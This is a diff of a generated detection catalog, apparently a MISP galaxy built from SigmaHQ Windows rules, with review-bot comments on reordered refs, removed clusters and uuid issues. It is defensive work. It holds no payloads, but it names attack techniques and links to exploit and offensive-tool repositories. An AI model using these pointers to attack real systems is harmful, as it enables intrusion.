"description": "Windows Defender logs when the history of detected infections is deleted. Log file will contain the message \"Windows Defender Antivirus has removed history of malware and other potentially unwanted software\".",
"meta": {
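Review bot: the `refs` array for the new Real-Time Protection cluster contains `"Internal Research"`, a bare string sitting between URLs. Anything that renders `refs` as hyperlinks (the galaxy HTML view included) will produce a dead link or choke on it. Have the generator filter non-URL reference entries out of `refs`, or carry them in a separate free-text field, so `refs` stays a list of URLs as it is for every other entry in this patch.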
@@ -11559,8 +11325,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware",
"https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide",
+ "https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_suspicious_features_tampering.yml"
],
"tags": [
@@ -11660,8 +11426,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/malmoeb/status/1535142803075960832",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md",
+ "https://twitter.com/malmoeb/status/1535142803075960832",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_transfer_via_uncommon_tld.yml"
],
"tags": [
@@ -11763,10 +11529,10 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://isc.sans.edu/diary/22264",
"https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
- "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
+ "https://isc.sans.edu/diary/22264",
"https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/",
+ "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_transfer_via_ip_address.yml"
],
"tags": [
@@ -11834,9 +11600,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md",
"https://twitter.com/malmoeb/status/1535142803075960832",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_transfer_via_file_sharing_domains.yml"
],
"tags": [
@@ -11870,8 +11636,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg",
"https://ngrok.com/",
+ "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml"
],
"tags": [
@@ -11904,9 +11670,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
+ "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83",
"https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx",
"https://twitter.com/gentilkiwi/status/861641945944391680",
- "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_dns_server_susp_server_level_plugin_dll.yml"
],
"tags": [
@@ -12023,29 +11789,6 @@
"uuid": "39f919f3-980b-4e6f-a975-8af7e507ef2b",
"value": "QuarksPwDump Clearing Access History"
},
- {
- "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2022/11/09",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "win_system_kdcsvc_rc4_downgrade.yml",
- "level": "high",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://support.microsoft.com/en-us/topic/kb5021131-how-to-manage-the-kerberos-protocol-changes-related-to-cve-2022-37966-fd837ac3-cdec-4e76-a6ec-86e67501407d",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/kerberos_key_distribution_center/win_system_kdcsvc_rc4_downgrade.yml"
- ],
- "tags": [
- "attack.privilege_escalation"
- ]
- },
- "uuid": "e6f81941-b1cd-4766-87db-9fc156f658ee",
- "value": "KDC RC4-HMAC Downgrade CVE-2022-37966"
- },
{
"description": "Detect suspicious error on protocol RDP, potential CVE-2019-0708",
"meta": {
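Review bot: this hunk deletes the "KDC RC4-HMAC Downgrade CVE-2022-37966" cluster (uuid e6f81941-b1cd-4766-87db-9fc156f658ee), but the same uuid, name and description are re-added later in this diff with the ref path changed from builtin/system/kerberos_key_distribution_center/ to builtin/system/microsoft_windows_kerberos_key_distribution_center/. The net change is therefore a directory rename upstream, not a removal, which is fine; just confirm that the uuid appears exactly once in the regenerated file, since a positional delete-and-reinsert like this is where duplicate clusters tend to slip in.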
@@ -12059,8 +11802,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://github.com/zerosum0x0/CVE-2019-0708",
"https://github.com/Ekultek/BlueKeep",
+ "https://github.com/zerosum0x0/CVE-2019-0708",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/termdd/win_system_rdp_potential_cve_2019_0708.yml"
],
"tags": [
@@ -12115,15 +11858,15 @@
"value": "Volume Shadow Copy Mount"
},
{
- "description": "During exploitation of this vuln, two logs (providername:Microsoft-Windows-User Profiles Service) with eventid 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation.Viewed on 2008 Server",
+ "description": "During exploitation of this vulnerability, two logs (Provider_Name:Microsoft-Windows-User Profiles Service) with EventID 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation. Viewed on 2008 Server",
"meta": {
"author": "Cybex",
"creation_date": "2022/08/16",
"falsepositive": [
- "Unknown"
+ "Corrupted user profiles - https://social.technet.microsoft.com/wiki/contents/articles/3571.windows-user-profiles-service-event-1511-windows-cannot-find-the-local-profile-and-is-logging-you-on-with-a-temporary-profile.aspx"
],
"filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml",
- "level": "high",
+ "level": "low",
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
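Review bot: the rewritten description for win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml still contains the duplicated verb "the directory \Users\TEMP is created may be created during the exploitation", so the upstream wording fix was only partial. Since this JSON is generated, the correction belongs in the SigmaHQ rule rather than here; the accompanying changes (level high to low, and a concrete false-positive entry for corrupted user profiles with a reference) are consistent with the description's own warning that EventID 1511/1515 are noisy.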
@@ -12150,9 +11893,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/",
"https://twitter.com/wdormann/status/1347958161609809921",
"https://twitter.com/jonasLyk/status/1347900440000811010",
+ "https://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/ntfs/win_system_ntfs_vuln_exploit.yml"
],
"tags": [
@@ -12495,6 +12238,29 @@
"uuid": "530a6faa-ff3d-4022-b315-50828e77eef5",
"value": "Anydesk Remote Access Software Service Installation"
},
+ {
+ "description": "Detects important or interesting windows services that got terminated unexpectedly.",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/04/14",
+ "falsepositive": [
+ "Rare false positives could occur since service termination could happen due to multiple reasons"
+ ],
+ "filename": "win_system_service_terminated_unexpectedly.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.randori.com/blog/vulnerability-analysis-queuejumper-cve-2023-21554/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_terminated_unexpectedly.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion"
+ ]
+ },
+ "uuid": "56abae0c-6212-4b97-adc0-0b559bb950c3",
+ "value": "Important Windows Service Terminated Unexpectedly"
+ },
{
"description": "Detects PDQDeploy service installation on the target system.\nWhen a package is deployed via PDQDeploy it installs a remote service on the target machine with the name \"PDQDeployRunner-X\" where \"X\" is an integer starting from 1\n",
"meta": {
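Review bot: the new "Important Windows Service Terminated Unexpectedly" cluster is tagged only with the tactic attack.defense_evasion and no technique, so unlike the Defender cluster at the top of this diff (attack.t1562.001 plus a "related" entry) it gets no related-to link into the ATT&CK galaxy. That is a faithful copy of the upstream rule's tags, but it leaves a "level": "high" rule whose only external reference is a QueueJumper (CVE-2023-21554) write-up without any cve.* tag or technique mapping; worth raising upstream so the cluster becomes navigable from the CVE or technique side.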
@@ -12748,8 +12514,8 @@
"logsource.product": "windows",
"refs": [
"https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/",
- "https://www.sans.org/webcasts/119395",
"https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/",
+ "https://www.sans.org/webcasts/119395",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_cobaltstrike_service_installs.yml"
],
"tags": [
@@ -13814,67 +13580,6 @@
"uuid": "f7385ee2-0e0c-11eb-adc1-0242ac120002",
"value": "Invoke-Obfuscation CLIP+ Launcher - System"
},
- {
- "description": "Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community",
- "creation_date": "2018/03/23",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "win_system_apt_oilrig_mar18.yml",
- "level": "critical",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_apt_oilrig_mar18.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.g0049",
- "attack.t1053.005",
- "attack.s0111",
- "attack.t1543.003",
- "attack.defense_evasion",
- "attack.t1112",
- "attack.command_and_control",
- "attack.t1071.004"
- ]
- },
- "related": [
- {
- "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "53ba33fd-3a50-4468-a5ef-c583635cfa92",
- "value": "OilRig APT Schedule Task Persistence - System"
- },
{
"description": "Detects PsExec service installation and execution events (service and Sysmon)",
"meta": {
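Review bot: this hunk removes the "OilRig APT Schedule Task Persistence - System" cluster (uuid 53ba33fd-3a50-4468-a5ef-c583635cfa92) together with its four related-to links, including the attack.g0049 group mapping. Any MISP instance that has already tagged events with this galaxy cluster will be left with a reference to a uuid that no longer exists in the galaxy, and the cross-links to the ATT&CK clusters disappear with it. Please confirm whether the upstream rule was deleted or only moved to a deprecated folder; if the latter, keeping the cluster entry avoids orphaning existing tags.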
@@ -13888,8 +13593,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://www.jpcert.or.jp/english/pub/sr/ir_research.html",
"https://jpcertcc.github.io/ToolAnalysisResultSheet",
+ "https://www.jpcert.or.jp/english/pub/sr/ir_research.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_psexec.yml"
],
"tags": [
@@ -13981,8 +13686,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100",
"https://twitter.com/deviouspolack/status/832535435960209408",
+ "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_eventlog/win_system_eventlog_cleared.yml"
],
"tags": [
@@ -14017,8 +13722,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100",
"https://twitter.com/deviouspolack/status/832535435960209408",
+ "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_eventlog/win_system_susp_eventlog_cleared.yml"
],
"tags": [
@@ -14050,8 +13755,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://bi-zone.medium.com/hunting-for-zerologon-f65c61586382",
"https://www.secura.com/blog/zero-logon",
+ "https://bi-zone.medium.com/hunting-for-zerologon-f65c61586382",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/netlogon/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml"
],
"tags": [
@@ -14137,37 +13842,27 @@
"value": "Sysmon Crash"
},
{
- "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\n",
+ "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation",
"meta": {
- "author": "frack113",
- "creation_date": "2021/12/15",
+ "author": "Florian Roth (Nextron Systems)",
+ "creation_date": "2022/11/09",
"falsepositive": [
"Unknown"
],
- "filename": "win_system_exploit_cve_2021_42278.yml",
- "level": "medium",
+ "filename": "win_system_kdcsvc_rc4_downgrade.yml",
+ "level": "high",
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_exploit_cve_2021_42278.yml"
+ "https://support.microsoft.com/en-us/topic/kb5021131-how-to-manage-the-kerberos-protocol-changes-related-to-cve-2022-37966-fd837ac3-cdec-4e76-a6ec-86e67501407d",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_rc4_downgrade.yml"
],
"tags": [
- "attack.credential_access",
- "attack.t1558.003"
+ "attack.privilege_escalation"
]
},
- "related": [
- {
- "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "44bbff3e-4ca3-452d-a49a-6efa4cafa06f",
- "value": "Potential CVE-2021-42278 Exploitation Attempt"
+ "uuid": "e6f81941-b1cd-4766-87db-9fc156f658ee",
+ "value": "KDC RC4-HMAC Downgrade CVE-2022-37966"
},
{
"description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded",
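Review bot: the net effect of this hunk is the silent removal of the "Potential CVE-2021-42278 Exploitation Attempt" cluster (uuid 44bbff3e-4ca3-452d-a49a-6efa4cafa06f, with its attack.t1558.003 mapping), since the lines that replace it are the KDC RC4-HMAC Downgrade cluster that was deleted earlier in this diff under its old path. Because the diff presents this as an in-place edit rather than a delete, it is easy to miss that a CVE-specific detection cluster has gone away; confirm this was intended (e.g. the upstream rule was retired) and not a side effect of the directory rename.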
@@ -14411,8 +14106,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/mattifestation/status/899646620148539397",
"https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/",
+ "https://twitter.com/mattifestation/status/899646620148539397",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/wmi/win_wmi_persistence.yml"
],
"tags": [
@@ -14685,11 +14380,11 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs",
"https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1",
- "https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726",
- "https://github.com/fox-it/BloodHound.py/blob/d65eb614831cd30f26028ccb072f5e77ca287e0b/bloodhound/ad/domain.py#L427",
"https://medium.com/falconforce/falconfriday-detecting-active-directory-data-collection-0xff21-c22d1a57494c",
+ "https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726",
+ "https://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs",
+ "https://github.com/fox-it/BloodHound.py/blob/d65eb614831cd30f26028ccb072f5e77ca287e0b/bloodhound/ad/domain.py#L427",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ldap/win_ldap_recon.yml"
],
"tags": [
@@ -14738,9 +14433,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
+ "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
"Internal Research",
"https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
- "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
"https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_uncommon_package_locations.yml"
],
@@ -14764,9 +14459,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
+ "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
"Internal Research",
"https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
- "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
"https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_package_locations.yml"
],
@@ -14790,9 +14485,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
+ "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
"Internal Research",
"https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
- "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
"https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_domains.yml"
],
@@ -14816,9 +14511,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
+ "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
"Internal Research",
"https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
- "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
"https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_appx_package_installation.yml"
],
@@ -14866,9 +14561,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
+ "https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/",
"https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
"https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
- "https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_mal_appx_names.yml"
],
"tags": [
@@ -15179,8 +14874,8 @@
"logsource.category": "create_stream_hash",
"logsource.product": "windows",
"refs": [
- "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
"https://lolbas-project.github.io/lolbas/Binaries/Regedit/",
+ "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml"
],
"tags": [
@@ -15541,9 +15236,9 @@
"logsource.category": "registry_event",
"logsource.product": "windows",
"refs": [
- "https://www.dfirnotes.net/portproxy_detection/",
- "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html",
"https://adepts.of0x.cc/netsh-portproxy-code/",
+ "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html",
+ "https://www.dfirnotes.net/portproxy_detection/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_portproxy_registry_key.yml"
],
"tags": [
@@ -15578,8 +15273,8 @@
"logsource.category": "registry_event",
"logsource.product": "windows",
"refs": [
- "https://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf",
"https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/",
+ "https://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf",
"https://persistence-info.github.io/Data/recyclebin.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_persistence_recycle_bin.yml"
],
@@ -15648,8 +15343,8 @@
"logsource.category": "registry_event",
"logsource.product": "windows",
"refs": [
- "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md",
+ "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_modify_screensaver_binary_path.yml"
],
"tags": [
@@ -15683,8 +15378,8 @@
"logsource.category": "registry_event",
"logsource.product": "windows",
"refs": [
- "https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760",
"https://www.lexjansen.com/sesug/1993/SESUG93035.pdf",
+ "https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760",
"https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mimikatz_printernightmare.yml"
],
@@ -15753,8 +15448,8 @@
"logsource.category": "registry_event",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Runonce/",
"https://twitter.com/pabraeken/status/990717080805789697",
+ "https://lolbas-project.github.io/lolbas/Binaries/Runonce/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml"
],
"tags": [
@@ -15787,8 +15482,8 @@
"logsource.category": "registry_event",
"logsource.product": "windows",
"refs": [
- "http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/",
"https://eqllib.readthedocs.io/en/latest/analytics/14f90406-10a0-4d36-a672-31cabe149f2f.html",
+ "http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml"
],
"tags": [
@@ -16026,8 +15721,8 @@
"logsource.category": "registry_event",
"logsource.product": "windows",
"refs": [
- "https://github.com/eset/malware-ioc/tree/master/oceanlotus",
"https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/",
+ "https://github.com/eset/malware-ioc/tree/master/oceanlotus",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_oceanlotus_registry.yml"
],
"tags": [
@@ -16578,10 +16273,10 @@
"logsource.category": "registry_event",
"logsource.product": "windows",
"refs": [
- "https://github.com/hfiref0x/UACME",
"https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/",
- "https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021]",
"https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass",
+ "https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021]",
+ "https://github.com/hfiref0x/UACME",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml"
],
"tags": [
@@ -16656,8 +16351,8 @@
"logsource.category": "registry_event",
"logsource.product": "windows",
"refs": [
- "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/",
"https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/",
+ "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml"
],
"tags": [
@@ -16758,8 +16453,8 @@
"logsource.product": "windows",
"refs": [
"https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer",
- "https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html",
"http://woshub.com/how-to-clear-rdp-connections-history/",
+ "https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml"
],
"tags": [
@@ -16933,11 +16628,11 @@
"logsource.category": "registry_delete",
"logsource.product": "windows",
"refs": [
- "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.md",
- "https://github.com/OTRF/detection-hackathon-apt29/issues/7",
- "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand",
- "https://docs.microsoft.com/en-us/windows/win32/shell/launch",
"https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code",
+ "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand",
+ "https://github.com/OTRF/detection-hackathon-apt29/issues/7",
+ "https://docs.microsoft.com/en-us/windows/win32/shell/launch",
+ "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml"
],
"tags": [
@@ -17037,8 +16732,8 @@
"logsource.category": "registry_add",
"logsource.product": "windows",
"refs": [
- "https://persistence-info.github.io/Data/diskcleanuphandler.html",
"https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/",
+ "https://persistence-info.github.io/Data/diskcleanuphandler.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml"
],
"tags": [
@@ -17095,11 +16790,11 @@
"logsource.category": "registry_add",
"logsource.product": "windows",
"refs": [
- "https://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/",
- "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/",
